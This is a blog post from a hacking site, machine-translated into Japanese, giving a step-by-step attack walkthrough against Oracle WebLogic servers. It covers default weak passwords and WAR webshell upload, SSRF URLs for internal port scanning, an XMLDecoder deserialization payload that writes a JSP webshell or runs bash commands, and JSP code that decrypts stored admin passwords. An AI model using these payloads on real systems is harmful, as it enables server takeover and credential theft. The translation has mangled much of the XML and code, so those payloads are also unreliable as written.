Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86399575

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

1。管理者ログインページ弱いパスワード

ウェブロジックのポートは一般に7001であり、弱いパスワードは一般的にweblogic/oracle@123orweblogicであるか、特定の状況、会社名、人名などに基づいて推測し、ブルートフォースの亀裂にバープセイトの侵入者を使用できます。成功したら、War Package GetShellをアップロードできます。

hqiiw2liuyk9041.png

2。 WebLogic SSRF

Oracle WebLogic Webサーバーには、外部ホストがアクセスでき、内部ホストへのアクセスも可能になります。このURLが存在する場合

http://192.168.8.128:7001/uddiexplorer/searchPublicRegistries.jspにはSSRFがあります。 192.168.1.59:139のポート139(オープン)とポート138(開いていない)の復帰とポートオープニングステータスを聞いてみましょう。

http://192.168.8.128:7001/uddiexplorer/searchpublicregistries.jsp?operator=3http://192.168.1.59:139rdosearch=nametxtsearchname=sself busing=seart business+

vdujg5aa0nq9042.png

http://192.168.8.128:7001/uddiexplorer/searchpublicregistries.jsp?operator=3http://192.168.1.59:138rdosearch=nametxtsearchname=severbtseartfor

kzz4bvu2bkk9043.png

3。 weblogic deserialization

Wenlogic Deserializationの脆弱性は長い間暴露されてきました。インターネット上でさまざまなツールを見つけることができるので、ここでは言及しません。

2hry25kakzi9044.png

vxq1revt5qw9045.png

4。 weblogic_uac

ステップ1:クロールhttp://x.x.x.x.x.x.x33607001/wls-wsat/coordinatorporttype postリクエストを開始する(URLペアがOKである限り、任意のパッケージは大丈夫です)

susidajbh4u9046.png

ステップ2 Content-Type:Text/XMLの追加ステップ3ボディにペイロードを置く

soapenv3360envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'

soapenv3360header

work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'

Javajavaバージョン='1.4.0' class='java.beans.xmldecoder'

オブジェクトクラス='java.io.printwriter'

Stringservers/adminserver/tmp/_wl_internal/bea_wls_internal/9j4dqk/a.jsp/stringvoid method='println'

string![cdata [`ここに馬を設定します(馬のコードが長すぎるので、ここにアップロードされたps:を表示しないでください。中国語を含めないでください。エラーを報告しない場合は、中国人を削除してアップロードできます。

]]/string/voidvoid method='close'/

/物体

/java

/java

/work:workcontext

/soapenv3360header

soapenv:body/

/soapenv3360envelope

lgm4vhogxzn9047.png

lgh4l3h5wz59048.png

上記はデフォルトのパスです。デフォルトのパスではなく、Linuxシステムでもある場合、次のペイロード爆発パスを使用できます。

soapenv3360envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'

soapenv3360header

work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'

Javaバージョン='1.8.0_131' class='java.beans.xmldecoder'

void class='java.lang.processbuilder'

array class='java.lang.string' length='3'

void index='0'

文字列/bin/bash/string

/空所

void index='1'

文字列-C/文字列

/空所

void index='2'

stringfind $ domain_home -type d -name bea_wls_internal |読み取りf;

/空所

/配列

void method='start' //void

/java

/work:workcontext

/soapenv3360header

soapenv:body/

/soapenv3360envelope

5。 weblogic online and offline decryption

ウェブシェルがある場合は、オンラインで復号化できます

アクセスのために次のコードをサーバーに入れ、s=''のウェブロジック暗号化パスワードを入力すると、boot.propertiesファイルで見つけることができます。デフォルトのパスは./././server/security/boot.propertiesです

0w0svp4ptgv9049.png

%@page pageencoding='utf-8'%

%@ページインポート='weblogic.security.internal。*、weblogic.security.internal.encryption。*'%

encryptionservice es=null;

ClearorEcryptedService CES=null;

文字列s=null;

s='{aes} wffnch6k+9nz22r1gcmnylgur9ho5kz8ndgib/tuozu=';

es=serializedsystemini.getEncryptionservice();

if(es==null){

out.println( '暗号化サービスを初期化できません');

戻る;

}

ces=new clearorEncryptedService(es);

if(s!=null){

out.println( '\ ndecryptedパスワードis:' + ces.decrypt(s));

}

オフラインの復号化には、2つのファイルSerializedsystemini.datとboot.propertiesが必要です

tdv5zbux2on9050.png

出典:https://xz.aliyun.com/t/2149